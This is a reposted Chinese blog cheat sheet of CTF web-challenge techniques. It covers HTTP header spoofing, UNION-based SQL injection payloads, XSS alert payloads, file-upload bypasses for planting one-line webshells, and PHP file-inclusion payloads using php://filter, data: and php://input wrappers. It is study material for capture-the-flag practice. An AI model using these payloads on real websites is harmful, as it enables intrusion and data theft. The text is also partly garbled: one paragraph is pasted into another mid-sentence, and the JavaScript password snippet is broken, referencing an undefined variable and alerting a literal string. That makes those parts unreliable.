CTF WEB总结

最新推荐文章于 2024-01-28 19:27:28 发布
最新推荐文章于 2024-01-28 19:27:28 发布
阅读量10w+ 收藏 39
点赞数 4
分类专栏: CTF
原文链接:https://mp.weixin.qq.com/s/dD8vGsc-Nm-AbDzh2ldt3w
版权

1.http协议报头

使用referer字段来伪造来源

问:某些页面要求你必须要通过http://www.xxxx.com进行访问?
答:增加一个referer字段
Referrer:http://www.xxxx.com (题目要求的url)
使用X-Forwarded-For来伪造ip

问:题目要求必须是某个ip地址如1.1.1.1,才允许访问。
答:增加一个X-Forwarded-For字段
X-Forwarded-For:1.1.1.1
使用User-Agent:伪造代理

问:某些题目要求必须使用某个浏览器如HAHA浏览器,才允许访问。
答:增加User-Agent字段
User-Agent:HAHA

问:页面要求必须要安装了.net 9.0版本了才能访问。
答:修改User-Agent字段
User-Agent:.NET CLR 9
使用Accept-Language修改语言

问:题目要求只能外国人才能访问这个页面。
答:修改Accept-Language字段
Accept-Language: en-US,en;q=0.8
直接查看http协议报头

问:题目什么都没有提示,但是答案就直接是藏在http请求报头里面。
答:在使用burp suit的时候注意看清楚头部有哪些内容。

2.sql注入

判断是否过滤常见关键字
答:在输入框中输入字符串:selectFromWhereUnionAndOrOderBy ,查看页面反馈回来的报错信息,如果报错信息中没有这一串字符串或者只有部分字符串,这说面消失的那一部分内过滤,这时候需要使用双写关键字或者大小写的方式绕过。比如说:select->selselectect->SelEct。

判断是否过滤特殊字符
答:同样的在输入框中输入字符串:’"( ) <>=空格,如果发现有字符消失,则说明该字符被过滤,需要采取编码的方式进行在输入框中输入字符串:selectFromWhereUnionAndOrOderBy ,查看页面反馈回来的报错信息,如果报错信息中没有这一串字符串或者只有部分字符串,这说面消失的那一部分内过滤,这时候需要使用双写关键字或者大小写的方式绕过。比如说:select->selselectect->SelEct绕过。如果是空格被过滤,可以考虑将空格替换成/**/。

判断列数和回显位置
答:在输入框中输入字符串:99‘ union select 1,2,3 。从select 1 开始,不断增加数字,直到页面显示正常。页面上出现的数字几,表示回显位置(注入点)在哪,之后将查询语句写在这个位置上。

获取数据库名(设回显位置是2)
答:99‘ union select 1, database(),3 from information_schema.SCHEMATA %23。

获取数据库中的表名
答:99’ union select 1,concat(TABLE_NAME),3 from information_schema.TABLES where TABLE_SCHEMA=查询到的数据库名 %23。

获取数据库中表的列名
答:99‘ union select 1,concat(column_NAME),3 from information_schema.columns where TABLE_SCHEMA=要查询的数据库名 and table_name=要查询表名的十六进制 %23。

获取数据库表中列字段的值
答:99‘ union select 1,concat(要查询的列名),3 from 要查询的表名 %23。

3.xss注入

问:xss注入这类型的题目一般是要求能够通过js代码注入的方式实现页面弹窗。
答:下面是几个最基本的弹窗语句:

<script>alert(/1/)</script>
<img src=1 onerror="alert(/1/)">
<img src="javascript:alert('1');">
<a href="javascript:alert(1)">

过滤测试字符串:
‘’;!–"=&{()}
绕过的方式可以参考:闭合标签,大小写,编码,双写,空格替换等等。

4.绕过上传

上传类的题目一般是要求上传一个包含一句话木马的脚本文件如php,上传成功后过关。针对这类题目的套路一般有以下几种:

前端页面限制文件类型

检测:在上传前开启burp suit的拦截功能,然后选择一个php文件上传,如果上传过程中burp没有检测到有http数据,但是页面提示上传错误,这就是前端限制的一个表现。
解答:先将php文件的后缀改成jpg等普通文件格式,然后在文件上传过程中使用burp suit修改文件的后缀回php,实现前端限制绕过。

黑名单限制绕过

检测:将要上传的php文件后缀改成一个谁都不知道的格式,然后上传,如果提示上传成功了,表明这题考的是黑名单限制绕过。
解答:web中间件除了可以解析php、asp、jsp等常规脚本文件外,还可以解析php2、php3、php4、htaccess、php5、pht、phtml、aspx、asa、jspx、js、ph、cer、cdx等格式,尝试修改成这些格式实现黑名单绕过上传。还可以尝试大小写文件后缀绕过。

MIME限制

检测:上传一张正常的图片文件,在上传的过程中使用burp suit将上传文件内的MIME类型内容,修改为非正常类型,如果提示上传失败表示该题目采用的是文件类型限制的方式。
解答:将MIME类型内容改为:image/jpeg,绕过MIME限制。

文件内容限制

检测:上传一个由txt文件(内容无意义或无内容)修改后缀形成的jpg文件,如果提示上传失败,则可能题目做了针对jpg文件内容的检测。
解答:使用edjpgcom软件制作一句话图片木马,绕过文件内容限制。

白名单限制

检测:如果以上方式都无法实现上传的话,有可能是服务器上面做了白名单限制,只能上传jpg等普通文件。
解答:尝试使用截断绕过和解析漏洞绕过来实现。

截断绕过

解答:上传x.jpg文件,在上传的过程中使用burp suit修改文件名为x.php\x00.jpg或者x.php%00.jpg、x.php:1.jpg

漏洞绕过

解答:Apache:修改上传文件名为x.php.abc,在低版本apache中,遇到不认识的后缀名会往前解析。
IIs:修改上传文件名为x.php;x.jpg,iis6.0中,截断字符是“;”冒号。
PHP以CGI的方式部署:直接上传图片木马x.jpg,在上传成功后图片的url后面加上1.php,图片可以被当成是php来执行。能够执行php的url如下所示:
http://www.xxxx.com/x.jpg/1.php

5.前端代码

查看页面源代码

问:页面上限制了鼠标右键,无法直接通过右键查看源代码。
答:在火狐浏览器中,在当前页面的url前面输入view-source:即可查看到页面的源代码。

输入框无法输入

问:要求在输入框中输入数据,但输入框无法输入。
答:将标签中的disable属性或者readonly属性删除。

输入密码过关

问:要求在输入框中输入正确的密码,才能通过。
答:寻找源码

计算密码

问:密码在源码中并不是直接给出的,而是通过代码得出。
答:比如在源码中看到密码由下面代码得出:

var str ="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
password = numletter.substring(11,12);
password = password + numletter.substring(18,19);
password = password + numletter.substring(23,24);
password = password + numletter.substring(16,17);
if(x == password){ alert("恭喜过关!");}

新建一个文本文档,文档的内容为:

<script> 
var str ="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
password = str.substring(11,12);
password = password + numletter.substring(18,19);
password = password + numletter.substring(23,24);
password = password + numletter.substring(16,17);
alert(‘password’);
</script>

将文件保存为x.html ,使用浏览器打开,弹框的内容就是算出来的密码。

跳转问题

问:在点击进入下一页的时候,有可能页面有细微变化或者明显进入下一页但又自动跳转回上一页。
答:使用burp suit删除响应包中的跳转语句如window.location.href=“xxx.php”;

6.文件包含与读取

文件读取

问:url带有明显的文件包含特征,比如:http://www.xxx.com/index.php?a=1.php
答:可以通过php://filter/read=convert.base64-encode/resource=index.php得到index.php的源码。
http://www.xxx.com/index.php?a=php://filter/read=convert.base64-encode/resource=index.php
如果题目flag在某个文件中,如flag.php,你就可以构造相应的url读取文件内容:
http://www.xxx.com/index.php?a=php://filter/read=convert.base64-encode/resource=flag.php
接着对页面上出现的字符串进行base64。

执行命令

问:要求能够执行php命令,且题目url带有明显的文件包含特征,比如:http://www.xxx.com/index.php?a=1.php
答:利用伪协议构造url:

http://www.xxx.com/index.php?a=data:text/plain,<?php phpinfo()?>
http://www.xxx.com/index.php?a=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
http://www.xxx.com/index.php?a=php://input  [POST DATA]:<?php phpinfo()?>

转自公众号国科漏斗社区https://mp.weixin.qq.com/s/dD8vGsc-Nm-AbDzh2ldt3w(在这里也推荐一波这个公众号),如有侵权请联系我删除。

夏日 の blog
关注
  • 4
    点赞
  • 39
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ctfweb题型总结大全(例题wp都有)
04-17
欢迎关注hacking水友攻防实验室,更多内容都在微信公众号
bugku ctf 程序员本地网站(请从本地访问
qq_42777804的博客
08-01 9782
打开网站之后 使用burp抓包 修改添加Client-ip: 127.0.0.1 (相当于从本地访问哈哈哈) forward即可
CTF WEB套路总结
2301_79880725的博客
01-28 915
----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | 2 | 3 | +----+----------+----------+ 1 row in set (0.00 sec) #大小写绕过。strcmp(str1,str2):若所有的字符串均相同,则返回STRCMP(),若根据当前分类次序,第一个参数小于第二个,则返回 -1,其它情况返回 1。
web的相关概念知识以及开发环境安装
m0_59076472的博客
12-05 1065
一、web的相关概念知识 Web系统的组成 Web是Internet上最受欢迎的一种多媒体信息服务系统,整个系统由Web服务器、浏览器和通信协议组成。 Web开发 Web开发就是设计实现Web系统的过程。 主要包括浏览器端页面的制作和服务器端程序的编写。 浏览器端称作Web前端, 服务器器端称作Web后端。 浏览器 浏览器是指可以显示网页服务器或者文件系统的HTML文件内容,并让用户与这些文件交互的一种软件。 常见的浏览器有:Firefox、Internet Explorer、Safari、O
IP限制绕过及gopher对redis的利用讲解
weixin_41489908的博客
10-03 830
你崩溃到凌晨,她和他睡到自然醒。。。 ---- 网页云热评 当对外发起请求时,会存在一个安全限制,比如去检测IP地址,去访问自己是不是127.0.0.1,相当于去访问内网段是192.168以及172网段。这种内网有非常明显的一个特征的,有不同的过滤存在,有的时候为了去绕过这些过滤,需要做出一些对应的方法以及策略去实现。 绕过 1、添加一个端口 限制情况下不允许纯IP的形式,默认情况下IP是80端口,比如访问的是99端口是可以的,一个加端口的操作,就可能去突破它的规则限制,当...
Web基本概念
qq_62377885的博客
06-08 1740
Servlet就是sun公司开发动态web的一门技术编写一个类,实现Servlet接口把开发好的Java类部署到web服务器中。
[email protected]
09-09
lorem ipsm dolor sit amet
java.lang.IllegalStateException: No instances available for localhost
chenglc1612的博客
11-30 2592
java.lang.IllegalStateException: No instances available for localhost 在SpringCloud的项目中,我们使用了自动配置的OAuth2RestTemplate,RestTemplate,但是在使用这些restTemplate的时候,url必须是服务的名称,如果要调用真实的域名或...
报错 | Access to XMLHttpRequest at ‘http://www.xxxxxxx.cn/xxxxx/xxxxx/xxxxx/login‘ from origin
热门推荐
A123ppleQueen的博客
11-22 34万+
Access to XMLHttpRequest at 'http://www.xxxxxxx.cn/xxxxx/xxxxx/xxxxx/login' from origin 'http://xx.x.x.xx:xxxx' has been blocked by CORS policy: Response to preflight request doesn't pass access control check: No 'Access-Control-Allow-Origin' header is pre
Nginx 监听www.xxx.com 和 xxxx.com 两个端口同时访问
小小程序猿㊫
05-22 28万+
server { listen 80; server_name www.xxxx.com “空格分割"xxxx.com; charset UTF-8; access_log off; error_log ”日志保存地址“; client_max_body_size 75M; location / { include uwsgi_params; uwsgi_pass 127.0.0.1...
各种类型URL的SEO权重比较
yong16888的博客
03-04 7万+
各种类型URL的SEO权重比较 各种类型URL的SEO权重比较: 1、 WWW前缀的二级域名权重最高      www.xxxx.com比aaa. xxxx.com权重要高      2、 二级域名比目录有优势      aaa. xxxx.com比www. xxxx.com/aaa/ 权重要高      3、 目录越深对排名越不利      www. xxxx.com/aaa/比www. xxxx.com/aaa/bbb/ 权重要高      一个网页的目录深度最好不要超过三级      4、目录权重比一
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结
CTF 比赛思路总结 PPT 含学习链接
09-13
信息收集 代码审计 web漏洞汇总 工具使用技巧 高级漏洞利用 web思路
005-CTF web题型总结-第五课 CTF WEB实战练习(一).pdf
07-09
005-CTF web题型总结-第五课 CTF WEB实战练习(一)
007-CTF web题型总结-第七课 CTF WEB实战练习(三).pdf
07-09
007-CTF web题型总结-第七课 CTF WEB实战练习(三)
框架搭建内容合成的描述
04-19
框架搭建内容合成的描述
【Godot4自学手册】第三十八节给游戏添加音效
最新发布
04-19
【Godot4自学手册】第三十八节给游戏添加音效
人工智能BBSO算法,MATLAB实现,很基本的人工智能算法,里面有很多源程序
04-19
人工智能BBSO算法,MATLAB实现,很基本的人工智能算法,里面有很多源程序 (Artificial intelligence bbso) 文件列表: BBSO\alea.m (99, 2013-11-02) BBSO\alea_normal.m (532, 2013-11-02) BBSO\alea_sphere.m (483, 2013-11-02) BBSO\BBSO.m (5647, 2015-05-03) BBSO\BSO.asv (3521, 2013-11-02) BBSO\calef.m (375, 2014-02-08) BBSO\cauchy.txt (1282, 2013-11-02) BBSO\cauchy.zip (9607, 2013-11-02) BBSO\cauchycdf.m (1225, 2013-11-02) BBSO\cauchyfit.m (5565, 2013-11-02) BBSO\cauchyinv.m (1379, 2013-11-02) BBSO\cauchypdf.m (1221, 2013-11-02) BBSO\cauchyr
人工智能神经网络.ppt
04-19
人工智能神经网络.ppt
ctfhub web技能树302跳转
07-28
CTFHub的Web技能树中,302跳转是一种常见的技术。根据引用\[1\],302跳转继承了HTTP 1.0中302的实现,即无论原请求是GET还是POST,都可以自动进行重定向。而根据引用\[2\],在使用curl命令进行下载时,可以通过参数-C -实现断点续传,即在下载过程中按Ctrl + C停止下载,下次可以接着上次的进度继续下载。这样可以节省时间,避免重复下载已经下载过的部分。 在某些情况下,302跳转可能会受到黑名单的限制。根据引用\[3\],黑名单可能限制了特定的网段,如127、172、10、192网段。然而,可以通过使用localhost的方式绕过这些限制。例如,将http://127.0.0.1/flag.php转换为短网址,并构造Payload发送请求,利用302跳转可以获取到flag。 总结来说,302跳转是一种常见的Web技术,可以用于重定向请求。在CTFHub的Web技能树中,了解如何使用302跳转以及如何绕过黑名单限制是很重要的。 #### 引用[.reference_title] - *1* *2* [2.CTFhub技能树 web前置技能 http协议 302跳转](https://blog.csdn.net/FFFFFFMVPhat/article/details/121342556)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树 Web-SSRF 302跳转 Bypass](https://blog.csdn.net/weixin_44037296/article/details/118482943)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值